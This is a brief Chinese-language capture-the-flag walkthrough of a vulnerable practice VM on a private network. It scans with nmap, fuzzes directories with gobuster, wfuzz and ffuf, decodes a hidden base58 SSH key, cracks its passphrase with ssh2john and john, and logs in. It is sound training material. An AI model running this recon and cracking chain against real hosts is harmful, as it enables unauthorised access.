搭建靶机;拖进来就行
扫描靶机IP
nmap -O 192.168.47.130
1.信息收集
nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log
目录扫描
gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/
2.寻找薄弱点
查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下
wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404
扫到一个 secret
3.解密
得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64
ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200
直接去访问一下这个文件mysecret.txt
去解密一下
base64解密不出来;base58可以;这就是登录系统的私钥
创建两个文档;2.txt写我们解密后的数据;1.txt空的
我们可以利用kali自带的ssh2john进行密码的暴力破解
把我们解密后的数据写到1.txt
ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!
4.登录系统
#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key #提升权限
dos2unix key #改变格式
#在连接
ssh icex64@192.168.47.133 -i key
成功获取flag